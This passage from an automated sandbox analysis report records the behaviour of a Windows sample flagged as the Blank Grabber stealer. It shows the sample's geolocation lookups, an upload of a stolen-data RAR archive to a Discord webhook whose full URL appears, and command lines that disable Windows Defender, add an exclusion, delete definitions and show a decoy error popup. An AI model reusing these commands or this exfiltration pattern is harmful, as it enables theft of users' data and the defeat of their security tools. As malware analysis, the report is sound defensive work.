Dec 13, 2024 08:38:03.959752083 CET	1.1.1.1	192.168.2.6	0x28f0	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49721	208.95.112.1	80	7432	C:\Users\user\Desktop\wsapx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 08:37:23.609836102 CET	117	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Dec 13, 2024 08:37:24.707539082 CET	175	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 07:37:23 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49823	208.95.112.1	80	7432	C:\Users\user\Desktop\wsapx.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 08:38:01.507622004 CET	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Dec 13, 2024 08:38:02.717205048 CET	381	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 07:38:02 GMT Content-Type: application/json; charset=utf-8 Content-Length: 204 Access-Control-Allow-Origin: * X-Ttl: 51 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49832	162.159.136.232	443	7432	C:\Users\user\Desktop\wsapx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:38:05 UTC	302	OUT	POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1 Host: discord.com Accept-Encoding: identity Content-Length: 731042 User-Agent: python-urllib3/2.2.3 Content-Type: multipart/form-data; boundary=0faf40e5cd1f1931bdb8b0465c783544
2024-12-13 07:38:05 UTC	16384	OUT	Data Raw: 2d 2d 30 66 61 66 34 30 65 35 63 64 31 66 31 39 33 31 62 64 62 38 62 30 34 36 35 63 37 38 33 35 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 65 6e 67 69 6e 65 65 72 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 e2 cd 2a 58 21 04 00 00 01 0f 48 8e 1a 89 eb b2 e3 a7 4a 34 6d 6d 7d de a2 9a e3 b4 73 21 f7 36 f8 ad e5 87 17 71 1d 01 e9 50 a2 9b 0c bc 19 c8 5b af 02 60 c8 fe 08 c5 b3 59 99 61 f0 99 bb 3e 27 79 a1 84 77 f8 89 85 10 8c 57 b2 7e db f5 79 c4 74 6d e7 de 18 86 54 ae e3 be a8 bb Data Ascii: --0faf40e5cd1f1931bdb8b0465c783544Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!*X!HJ4mm}s!6qP[`Ya>'ywW~ytmT
2024-12-13 07:38:05 UTC	16384	OUT	Data Raw: 07 53 80 f4 d3 a6 be 1a 4b 8b 09 ad b7 2b db 35 7a 80 09 6f 9e d4 98 83 8e 60 1c 6f 25 6f 13 59 a8 3f 08 04 27 95 c9 7c 4e 90 8d 2b 09 85 59 20 f2 f1 b9 1f c0 c8 ff c4 32 55 6d 5f 94 c9 af 5a fb 3c 71 3b 19 c3 4f e4 eb 42 38 4d f7 aa 67 7b de 9b 06 0c 24 30 6e 2c a4 24 90 4f 0d e9 04 08 50 0f ee 8c 47 96 de 44 6c a5 a5 4f 28 bc 3a bb e5 90 3d 53 9d c9 fa 34 be 88 f7 ca 49 1e 91 dd 90 84 f1 52 90 8c b2 2b 36 50 ea 10 d8 7e bc 37 f9 21 68 58 48 11 85 de 2e a0 e2 9b 65 18 48 2b 19 16 fa 72 62 69 bc 62 b7 76 c3 7a d4 27 ac 9e db 7c 20 c9 30 4d 26 8b c4 03 4a 69 70 f3 6d 9d ac b4 a4 ac 68 65 08 f7 85 10 96 e0 5d 10 ae 28 b6 ef 28 3d 14 31 c7 ec a2 a2 70 6e d0 d7 40 f0 4a 28 e9 46 84 1d 9e b2 1d b8 a6 15 cd fe 05 80 58 41 a4 ca 09 d1 cc 86 20 7a 2f 2d 56 5b 1f Data Ascii: SK+5zo`o%oY?'\|N+Y 2Um_Z<q;OB8Mg{$0n,$OPGDlO(:=S4IR+6P~7!hXH.eH+rbibvz'\| 0M&Jipmhe]((=1pn@J(FXA z/-V[
2024-12-13 07:38:05 UTC	16384	OUT	Data Raw: 03 a9 d7 20 e8 0e df c0 e6 42 ea 11 0f 50 8e 1c 98 1a ba 93 e4 41 42 c7 a8 d0 45 51 50 26 db 9a 80 d9 6a 2f 24 e5 f3 7f 3f 42 32 ac 3f 5a 97 00 e3 a8 6c f3 81 49 1e 1e 16 a4 9a 04 d2 b2 66 ef c2 49 45 de d9 35 27 cb cc f6 ab b5 85 7f c6 cb bd a6 7f 90 14 9a 34 ca 10 12 5b 05 18 e2 10 99 8b 3e 85 70 68 a6 42 c9 5f f6 d3 87 51 30 18 d2 00 88 7f 23 0f b8 73 a9 9d bf e2 6b cb ac a5 d5 5a fb b6 f0 a1 9d 61 eb 63 4f 21 c6 27 c2 d2 26 0a bc e6 36 66 ef cf 33 0b 5d 52 92 9c 1a f0 04 37 07 38 06 85 eb 66 4f 23 d5 2d 6c 2c 97 1b bf d2 12 0b 50 de f3 f5 79 5b 4e e1 6e 62 19 16 84 69 a4 de 46 ae 1f e2 1c ba f5 d8 ab f5 92 e1 13 b4 6f 1c 8d 95 74 8d 29 82 cb da f4 2d 83 bf b2 6c 70 f5 36 a0 f8 bb f3 13 75 b4 6e 32 84 08 53 8e 44 8d 90 04 0b 9a 7a 7d d8 b8 6a e5 a8 a9 Data Ascii: BPABEQP&j/$?B2?ZlIfIE5'4[>phB_Q0#skZacO!'&6f3]R78fO#-l,Py[NnbiFot)-lp6un2SDz}j
2024-12-13 07:38:05 UTC	16384	OUT	Data Raw: 87 69 ee c3 75 2e 96 99 29 0b 29 1a 0e 0e 7f 17 13 7c b5 b7 a1 4e 8d 29 0a f6 96 a3 b0 9f 0a f0 3b bb 9c 23 63 f2 52 b6 17 60 e1 8c e1 7f 5b d8 19 5e ab 7a 47 dd 7d 3f 5d e6 cc 66 0c fe f1 67 cc 1f 50 5c 58 48 0f 16 af e1 57 88 18 92 91 b6 f6 8a 7f d9 18 78 4f c0 ea 0e 46 1b 2d 5c aa fa 50 2c 82 e8 cb d7 de d6 67 ab 98 84 88 5e 04 cd fc 6c 4a 95 e9 ea da 89 7e c3 fb 13 36 5a e8 e2 43 95 92 f8 5a 1a 7e a3 d0 47 d8 8a d3 10 e7 03 47 4a d8 d3 34 54 63 79 18 cc cc ec 02 62 ed 98 92 e4 1e 3b c9 f8 ab 75 5e fb d6 52 d1 bf b1 c7 d3 3a b5 11 08 14 d4 56 f5 0b 7a 9b c0 40 7b 3b 42 27 3d f8 ca 41 41 77 b6 d7 b1 43 2c 02 25 b7 bf 3b a2 37 76 ca 05 8b 27 10 af ca ab ef 0f 01 c4 e5 47 62 a9 0b 69 c5 84 ab 18 9c ef d3 2f 1c cf ed 84 47 72 72 49 8f 43 38 a9 60 d5 18 2e Data Ascii: iu.))\|N);#cR`[^zG}?]fgP\XHWxOF-\P,g^lJ~6ZCZ~GGJ4Tcyb;u^R:Vz@{;B'=AAwC,%;7v'Gbi/GrrIC8`.
2024-12-13 07:38:05 UTC	16384	OUT	Data Raw: 0a f5 65 d7 31 e5 89 99 77 ae 19 30 13 e6 0a 95 92 b2 7f 6c e9 98 34 61 ec 1e da 93 d9 1c a3 32 df 87 67 06 ea 4b 24 97 f5 11 fa 4f 39 77 67 6e 07 4f 60 5a d3 17 e3 aa 6a 63 e5 49 86 f1 89 15 7a e8 b0 17 aa 71 06 1f 03 d2 3f 09 54 14 30 51 e2 3e a5 50 7e b8 7c c5 aa 21 dc 53 c7 9c 64 97 10 cf 31 74 dc 2a 49 f5 b7 10 14 a9 0c e3 5f 0f 9e 07 8d a7 81 36 39 9e cb 66 4d 91 f2 72 e1 3f fd 94 c3 bf fa 83 8b 8d d2 36 87 67 56 ed ba 2c 61 88 18 68 c9 ea a4 cf b0 39 25 c4 69 c7 0c ce 9c 57 14 42 3f c4 e8 ca a4 67 34 bc c8 f1 4d ca 60 94 71 4e 74 0c 7d ea 09 b4 41 65 53 a5 9a e4 81 01 27 e8 15 e4 05 48 8b d9 9a 3e e1 6b 92 a5 44 bf 82 96 c1 19 1b 8c 5f 81 01 24 45 7d bc 31 f7 50 15 b0 73 ec 73 43 ef 94 72 45 2f b0 16 43 4b 60 e2 f8 29 b8 7f bc d3 7c 9b 3e 66 a8 c5 Data Ascii: e1w0l4a2gK$O9wgnO`ZjcIzq?T0Q>P~\|!Sd1t*I_69fMr?6gV,ah9%iWB?g4M`qNt}AeS'H>kD_$E}1PssCrE/CK`)\|>f
2024-12-13 07:38:05 UTC	16384	OUT	Data Raw: 7c 0d d4 b2 65 ef 13 51 29 75 41 9d 9b b9 47 2f 74 9c 79 9a 73 e8 6a 85 e6 4a 96 d5 d4 83 ce 85 fa f8 82 70 0b 50 0b 7a 66 41 12 6f 09 86 b5 e3 06 07 e4 2a 9e 49 9d 0d 77 78 0e 44 0c 03 7b 02 d0 e5 88 df 92 5c a2 7a ec fa 76 8c 8b 2b c7 85 58 e9 3c 37 61 fe 6c 85 5f 34 5c 12 14 fd 35 55 8d ed 3d 00 83 f6 45 57 ec d5 93 28 67 78 2c ab cf 71 2b f6 69 af ae f5 aa ca bd 76 75 59 82 f9 31 7e db c2 90 1f 53 8f d7 9d c5 09 63 1c 8f f1 d6 57 c0 d6 9a 6c 8f e9 08 81 91 0c 2c 7d d3 3f d2 f9 e7 8d bb 74 db 7b 3c d4 0f ac 90 c1 0c c5 7f ed 06 39 28 fa 9f 5a 14 94 85 08 93 fe a8 79 c4 f2 1a 2c 0d b3 e3 5a fe 66 ce a9 b8 f8 c1 62 f9 8a bb 2c cd f2 4c 8e 66 08 d8 f1 c3 6f 03 8e f2 1a 9a 05 ea 69 2d fa e6 da 7c 35 10 be 38 d6 6f 29 06 01 b4 43 84 d1 d8 1d 18 fc 57 40 3d Data Ascii: \|eQ)uAG/tysjJpPzfAo*IwxD{\zv+X<7al_4\5U=EW(gx,q+ivuY1~ScWl,}?t{<9(Zy,Zfb,Lfoi-\|58o)CW@=
2024-12-13 07:38:05 UTC	16384	OUT	Data Raw: c2 f8 93 a3 2f 37 85 8b c5 65 02 b9 d6 af 12 2b ae 38 d1 c2 47 17 42 2c d4 9a c6 17 de 76 e4 96 b8 d5 6b d8 09 a0 35 c6 fc f6 74 45 94 2b dc 3c 6a 7d 91 94 5d c3 13 35 bc ad d7 05 89 4a f2 e7 14 cd 1e 71 08 6b d4 6c 31 63 31 23 f6 ad 96 db d5 f3 22 7c 5c 21 7f 10 44 23 04 38 80 3b 6d 5c b8 15 82 b7 f8 bb 7f 11 67 70 70 16 19 3d 71 04 00 7e 80 31 3f 99 1b 58 ae 9e 11 70 cf ce 51 f7 7f 55 da 7c 1a 84 70 b6 fb 58 2d 04 74 9c 44 12 ae dc a3 95 d0 72 6b 8d 99 f6 bf af 8f 77 1b d0 6c 33 18 a0 a4 ce d2 fe 0c 85 96 62 68 5f 2f 00 e2 9b ae 4f ea 29 eb 40 97 31 f3 cb 84 18 dc 08 75 0d 78 a3 33 9e 9f 94 6f db ee 60 f4 fa 8d c5 ad 39 b1 68 c9 94 7b ad b9 20 d4 fe 65 63 40 e1 61 5c 4d 6c 8d c4 96 89 2c ec 45 eb ce 70 62 03 94 17 a5 e0 f1 e1 aa 7c 31 29 ff 5a ba 39 29 Data Ascii: /7e+8GB,vk5tE+<j}]5Jqkl1c1#"\|\!D#8;m\gpp=q~1?XpQU\|pX-tDrkwl3bh_/O)@1ux3o`9h{ ec@a\Ml,Epb\|1)Z9)
2024-12-13 07:38:05 UTC	16384	OUT	Data Raw: 62 6a 74 48 7b 8c 4f c0 59 0d 68 6e 1d a4 19 d9 84 03 61 9c be 96 1e e8 8a 12 cc b7 bf 01 81 4f 74 f8 1c 19 33 d2 89 0d 2c 47 ba 69 93 73 b0 39 e2 c7 43 c6 8e ce 60 88 77 b4 e1 21 8e 61 7d 88 40 b1 8d 1e ea 4e 26 1f 01 17 c0 2e f1 9a 16 53 1b 4b 8c f3 31 e2 58 59 ca 26 6d c1 6a c8 17 7a c0 f9 68 73 8f 00 f6 b2 e0 16 15 1d 88 ec ab d8 93 17 76 35 94 6f 45 75 87 3e 4c 32 0c 5e ac 76 6b 2e 04 4b bc e5 42 4a bf 4d 2c 0b 85 77 1c 27 38 a6 b3 73 ca 40 4c 3b b6 82 6f 0a 5e 28 d4 64 6f 0d 03 9c 61 68 21 f9 0c 29 c2 c0 e8 ce 70 85 47 8a 5d 96 0a 2b dc 53 80 a9 86 93 29 d9 87 b3 8e db 4d 01 40 0f be 72 98 cd 92 57 3a ec c7 f2 e2 30 61 ef c4 a3 3d c8 d3 b6 6f 99 46 9d ea 5c b3 81 0a 3d e5 4c 5f ee ea 31 07 1b e3 88 49 59 59 ad 0d 37 8a 27 39 72 ff 12 bf 69 3d 8c cc Data Ascii: bjtH{OYhnaOt3,Gis9C`w!a}@N&.SK1XY&mjzhsv5oEu>L2^vk.KBJM,w'8s@L;o^(doah!)pG]+S)M@rW:0a=oF\=L_1IYY7'9ri=
2024-12-13 07:38:05 UTC	16384	OUT	Data Raw: 15 d0 00 70 a0 f2 7b b1 b1 d4 a3 74 3b dc 5a 62 52 03 dc f7 31 61 f0 ab ce 97 e9 b7 8c 97 03 3c f0 c4 f8 9a a6 48 78 22 ad 6f c3 73 ff dc 9d fa 88 23 12 f6 a0 41 c5 fa 7f dd 53 e5 00 16 e2 3a 80 60 ae d5 08 ee da 88 9c 32 fa 09 e4 b5 02 c4 5e 23 00 e1 9d fe e2 66 ad af b1 99 4e 10 6d 31 51 56 fc 29 0e 71 d7 f2 20 56 90 6b d2 1b 75 f8 2a 56 8a a5 8d a3 cf 49 77 83 24 9f 46 e0 ed 20 df 28 0b 2d b8 1d 50 ff 60 b6 11 e7 5c 35 d2 30 7d c5 c4 c1 38 94 be 31 77 7a 0e 66 f0 86 ee 80 05 e3 a4 6c 90 ce 4e e3 8a d7 87 c0 d0 f4 8e e7 53 4b 1a a0 71 16 f6 a3 e1 da 9a 23 5b 3f 31 be 55 a5 cb d5 d3 10 48 6c a2 30 03 30 13 11 98 d2 11 20 74 f3 79 8e d6 75 e7 72 fc a3 5a e4 e5 05 49 74 2a b0 f4 e3 49 cd ba 8e d0 57 46 f5 44 bf 94 1c e4 a0 7a c0 56 1a c0 ba 6b c8 91 27 86 Data Ascii: p{t;ZbR1a<Hx"os#AS:`2^#fNm1QV)q VkuVIw$F (-P`\50}81wzflNSKq#[?1UHl00 tyurZItIWFDzVk'
2024-12-13 07:38:05 UTC	16384	OUT	Data Raw: 0e e6 2e c1 df 21 cf 32 8e 3d 85 27 a4 d3 10 ac 3e 4d e0 3c d2 bf cd 10 84 d0 56 e7 35 45 28 31 3f c8 c1 bb 2f 5a ec 7d 5f f0 1d ca a3 02 af 17 ae 5b 9b 38 50 b7 ea d0 b4 db 15 8e 51 04 ab fa 38 e5 09 ea f0 4d 20 9e 89 ee c4 29 65 c3 b3 cb 28 ee b3 70 74 cc a7 fc 43 fb 95 64 7a 3d fc e5 f8 30 b9 e0 3a 5b 6e a6 20 33 9f 41 63 9b a0 ca 72 a4 f8 4e 21 a5 c2 be 24 20 1f 39 4f 36 e0 07 83 51 30 2f 83 70 d1 a9 4c 2f 8f d0 69 8f 9b 59 bb cd e7 e7 0a ee dc 2e 9c 93 0d f1 97 63 35 e0 06 f2 10 28 ab 19 00 c6 87 ac a4 f0 0d 58 18 19 f9 70 4d da a6 2d e4 b7 a2 a0 c0 99 57 a9 6b 09 21 df c1 25 6c 52 63 fc fa 55 8e 93 30 35 86 9f f5 19 45 96 d5 f2 76 f6 ad b9 79 cf d5 ac 1d 95 68 a3 7c 54 7e b3 b1 f5 1d fb 81 60 8e d3 23 fd d6 7e 81 bd e9 3c ae 4c a3 b1 ef ca 03 3d f1 Data Ascii: .!2='>M<V5E(1?/Z}_[8PQ8M )e(ptCdz=0:[n 3AcrN!$ 9O6Q0/pL/iY.c5(XpM-Wk!%lRcU05Evyh\|T~`#~<L=
2024-12-13 07:38:06 UTC	1253	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 07:38:06 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1734075487 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4lllrWnMiPrHeZ3hKh5y1SCJz5d9pCBQSw7m1rePD9qkRF5P0A8nYrAcLtSpqV726obINY31CIdI6NlQG1V3pMGyA5tVsJ8lUVZq%2FmobiLUJ8quIRCmHsarj%2BDaQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=4a3d3e501b1e2428812603716b0f256d8644b9af-1734075486; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=9cJeKDbCz.ZFeL4K6jS.s_pRajFY0tKlwFpKAskX.VA-1734075486542-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f144ae79dee7d26-EWR

Target ID:	0
Start time:	02:37:15
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\wsapx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\wsapx.exe"
Imagebase:	0x7ff7c71b0000
File size:	7'839'456 bytes
MD5 hash:	E302186AE6217D48FC6EEF1FE780EC26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2152150044.0000015A08634000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2152150044.0000015A08632000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:37:16
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\wsapx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\wsapx.exe"
Imagebase:	0x7ff7c71b0000
File size:	7'839'456 bytes
MD5 hash:	E302186AE6217D48FC6EEF1FE780EC26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2648275073.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2653293501.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2643435154.000001C87B04B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:37:19
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:37:19
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:37:19
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:37:19
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:37:19
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:37:19
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:37:20
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:37:20
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:37:20
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:37:20
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:37:20
Start date:	13/12/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
Imagebase:	0x7ff642d20000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:37:20
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:37:20
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff644170000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:37:20
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:37:20
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff74c130000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:37:23
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
